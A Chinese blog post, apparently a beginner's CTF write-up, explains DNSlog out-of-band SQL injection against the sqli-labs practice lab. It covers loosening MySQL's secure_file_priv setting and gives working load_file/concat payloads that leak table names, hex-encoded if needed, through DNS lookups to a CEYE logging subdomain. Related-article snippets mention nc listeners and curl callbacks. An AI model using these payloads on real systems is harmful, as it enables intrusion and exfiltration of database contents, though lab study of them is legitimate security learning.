小白的CTF之路之DNSlog注入

最新推荐文章于 2024-05-15 02:36:49 发布
最新推荐文章于 2024-05-15 02:36:49 发布
阅读量1k 收藏 5
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/glass_york/article/details/128592822
版权

在之前的文章中关于sqlilabs的第九题,看似只能用时间盲注,但其实经过深入学习后,还有一种方法------DNSlog注入法。

这个方法的原理就是利用数据库可以发起DNS请求的性质,将数据带出。将数据传输到一个域名里。在这个域名中,我们可以读取域名的解析日志。

使用DNSlog注入的前提条件:1.系统为Windows系统,只有Windows系统的DNS解析有利用的可能(这里指的是目标服务器)。2.需要一个域名用于接收解析信息,目前网上使用率很高的域名生成平台是CEYE - Monitor service for security testing 。该域名注册后即可使用。3.MySQL数据库中需要用到 load_file)()函数。在数据库中可能需要改动一下配置。

域名生成平台:

在ceye中实名注册后登录

 其中的identifier就是用于接收DNS解析信息的域名。

配置数据库:

首先确保自己的数据库是开启状态,win+R打开管理器输入cmd进入cmd命令运行,找到自己的数据库的盘,例如我的数据库是放在D盘的所以输入D:打开D盘。

 接着打开装有数据库的文件夹一直开到bin文件

复制该路径,在 命令运行里输入cd空格任何右键,刚刚复制的路径就粘贴到了命令运行里。执行后再输入mysql -uroot -p,输入密码,进入数据库。

密码是用户自己安装MySQL时设定的,如果不记得密码了,可以试试默认密码:root

现在,输入show variables like '%secure%';查看load_file()函数可以读取的磁盘。

 目前secure_file_priv后面的值为NULL,说明该函数没有读取任何磁盘的权限,若后面的值为某个磁盘名,说明可以读取该磁盘,若值为空,说明可以读取任何磁盘。现在我们需要让该函数有权限读取任何磁盘。直接在my.ini文件里修改。

 

  当内容为secure_file_priv=''即可,这个地方可能要多试几次。有可能会不成功。如果my.ini文件里没有这一行,手动在[mysqld]下面加上该命令即可。完成后再次查看可读取的磁盘

此时load_file()函数就可以读取所有磁盘了。

测试:

使用slqilabs的第九关测试,因为第九关的时间盲注法太费时间,DNS log注入刚好用于无回显的数据库注入。

该注入命令基本上就是固定格式,只需要把sql语句写在中间,涂黑的地方是自己注册的域名。执行该语句后,即可在平台上查看 

 接下来就是常规爆表

 然而,此时平台没有接收到任何反馈,既然第一次能成功,而后面失败了,只能说明是语句的问题。经过反复试验,发现不能用group_concat,如果一次只爆出一个表名就可以。

?id=3'and if((select load_file(concat('\\\\',(select (table_name) from information_schema.tables where table_schema=database() limit 0,1),'.xxxxxx.ceye.io\\abc'))),1,0)--+这样一次只爆出一个表

就可以成功,这样一来效率其实并不高,不过比手动时间盲注要强多了。另外,如果目标数据库的数据中有特殊字符如@#¥%……&*等则需要使用hex编码。 即:?id=3'and if((select load_file(concat('\\\\',(select hex(语句)),'.xxxxxx.ceye.io\\abc'))),1,0)--+则在平台上回返的是字符进行16进制后的编码,找个解码器解码后即可。

 

 

glass_york
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF之GIF图片分离工具
02-23
misc方向直接GIF图片分离
DNSlog注入(利用DNSlog平台将SQL盲注变成回显注入
柠檬i的博客
08-07 1225
DNSlog注入是一种利用DNS服务器记录域名解析请求的特性,来获取SQL注入结果的技术。它的原理是通过构造一个包含数据库信息的子域名,然后使用MySQL的load_file函数或其他方法,让目标服务器向DNS服务器发起解析请求,从而在DNS服务器上留下注入结果的痕迹。
DNS_LOG注入
学习、分享、交流
05-19 1563
DNSLOG注入:利用DNS解析,日志记录把数据库里面的内容给带出来···
CTF入门web篇18命令执行无回显的判断方法及dnslog相关例题_ctf web题传参数后没有回显
最新发布
m0_60707685的博客
05-15 437
例:我们在公网机上可以通过”nc -lv 端口号”来监听该端口,当目标机”curl 公网机ip:端口号”的时候,公网机的该端口可以发现有http请求过来。目标机通过向公网可通信的机子发起http请求,而这个公网可通信的机子是我们可控的,则当该公网机子收到http请求就代表命令有执行。命令执行可能会存在命令执行完没有回显,首先要判断命令是否有执行,可以通过三种方式来判断:延时、HTTP请求、DNS请求。通过是否延时来判断该条命令是否有执行,有延时则代表命令有执行。(”sleep 3”表示延时3秒)
DNSLog注入
一期一会的博客
01-13 4174
DNSLog注入原理 在sql注入时为布尔盲注、时间盲注,注入的效率低且线程高容易被waf拦截,又或者是目标站点没有回显,我们在读取文件、执行命令注入等操作时无法明显的确认是否利用成功,这时候就要用到我们的DNSlog注入。 首先需要有一个可以配置的域名,比如:xxx.io,然后通过代理商设置域名 xxx.io 的 nameserver 为自己的服务器 A,然后再服务器 A 上配置好 DNS Server,这样以来所有 xxx.io 及其子域名的查询都会到 服务器 A 上,这时就能够实时地监控域名查询请
DNS-log注入(zkaq靶场)
v2ish1yan的博客
04-21 1287
DNS-log注入
DNSlog外带原理及注入分析
热门推荐
Sentiment的博客
04-27 1万+
前言 最近一直听到DNSlog外带原理等词但对其原理一直只是自己的理解(回显DNS请求后的日志)并没有真正的了解过,所以这里做一下记录。 DNSlog原理 DNS DNS(Domain Name System)就是域名系统,负责把域名转换成IP地址;例如向浏览器访问a.com,浏览器就会将其解析成真实的IP访问对应服务器上的服务。 DNSlog DNSlog就是DNS的日志,DNS在域名解析的时候会留下域名和解析IP的记录 DNSlog外带原理 DNS在解析的时候会留下日志,我们将信息放在高级域名中,传递到
dnslog注入_dnslog盲注
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-09 1772
dnslog注入原理通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将dnslog注入盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。dnslog注入主要用于布尔型盲注、时间型盲注、有注入但是无显示,注入线程太大容易被waf拦截等情况。主要原理就是利用load_file这个函数,这个函数的目的是读取本地文件,也可以对外发送请求,利用这个函数,我们再使用concat函数将dnslog
CTF之二维码扫描.7z
12-02
这个"CTF之二维码扫描.7z"压缩包显然与CTF比赛中的一个环节有关,即二维码扫描。二维码在现代生活中无处不在,它们可以存储各种信息,如网址、文本、联系人信息等。在CTF竞赛中,二维码可能被用作隐藏线索或加密信息...
ctf之misc所需要工具
06-05
基本包含了所有misc所需要的工具,还有很多在线工具,自行百度即可 (绝对不吃亏,如果还觉得少了请联系我)
ctf之图片隐写
06-09
在提供的压缩包文件中,包含了四个名为"ctf之图片隐写-20185181635*5206_**162.ppt"的PPT文件。这些文件很可能包含关于图片隐写技术的讲解,或者是具体的隐写题目。可以打开这些PPT,查看其中的图片和内容,运用上述...
ctf工具之密码学.zip
10-07
RSA解题工具,Ashdict弱密码生成器,hash密文识别,JS混淆,彩虹表工具,米斯特团队工具,密码机器,小葵多功能转换工具等
DNSDNSLog
qq_45675619的博客
05-11 2023
这里写目录标题DNS简介解析过程DNSLog简介ceye的使用DNSLog注入SQL盲注 DNS 简介 DNS(Domain Name System),也就是域名系统。将域名与IP地址相互映射的一个分布式数据库。DNS使用UDP端口53。 域名解析的过程就是将域名去DNS服务器的数据库中寻找,这是比较耗费时间的。为了提高上网速度,运营商一般在他们的DNS服务器中缓存了许多的DNS记录,再根据用户所在地进行网络分配。这样用户打开网页则不需要去查询DNS数据库,而是直接使用缓存的DNS记录。 解析过程 大致流程
DNSlog,ceye,burp collaboration无法访问
Withdraw_end的博客
03-08 1815
DNSlog,ceye,burp collaboration一直无法访问 其实就是被当前网络下的设备墙了,用手机开热点就解决了。
巧用DNSlog实现无回显注入
weixin_30335575的博客
12-16 1072
测试一些网站的时候,一些注入都是无回显的,我们可以写脚本来进行盲注,但有些网站会ban掉我们的ip,这样我们可以通过设置ip代理池解决, 但是盲注往往效率很低,所以产生了DNSlog注入。具体原理如下。 首先需要有一个可以配置的域名,比如:ceye.io,然后通过代理商设置域名 ceye.io 的 nameserver 为自己的服务器 A,然后再服务器 A 上配置好 DNS Serv...
利用 DNSLog无回显注入
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
07-18 627
基本上,DNSLog服务提供了一个自定义的DNS服务器,将请求保存在日志中,并为每个请求生成一个唯一的域名。无回显注入是指在注入点无法直接获取响应的情况下,通过DNSLog获取注入结果的一种注入方式。无回显注入的原理是将注入结果作为DNS请求的一部分,通过DNSLog获取DNS请求的响应,从而获取注入结果。构造注入payload:根据目标应用程序的注入点,构造用于触发DNS请求的注入payload。通常,注入点位于应用程序的输入字段中。触发注入:向应用程序提交经过注入负载处理的请求,以触发注入攻击。
DNSlog注入学习
mingyqf的博客
06-03 1637
原文链接:https://www.cnblogs.com/Xy–1/p/12896599.html 作者: Lushun之前一直有看到过DNSlog这个字眼,但一直没有好好去了解一下,最近又接触到了刚好来深入学习下 我们都知道DNS就是将域名解析为ip,用户在浏览器上输入一个域名A.com,就要靠DNS服务器将A.com解析到它的真实ip127.0.0.1,这样就可以访问127.0.0.1服务器上的相应服务。 那么DNSlog是什么。DNSlog就是存储在DNS服务器上的域名信息,它记录着用户对域名www.
ctf-DNS信息收集
panwanpeng的专栏
05-29 303
该工具的主要重点是分析通过互联网访问的数据之间的真实世界关系,其中包括足迹互联网基础设施和收集有关拥有该网络的人员和组织的数据。通过使用OSINT(开源情报)技术,通过查询whois记录,社交网络,DNS记录,不同的在线API,提取元数据和搜索引擎来搜索这些数据之间的连接。该工具将提供广泛的图形布局结果,允许对数据进行聚类,使关系准确和即时。(4)指定地区端口: city:beijing port:80。(3) 端口查询: port:80 3389。3、使用dig命令 传参 any。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值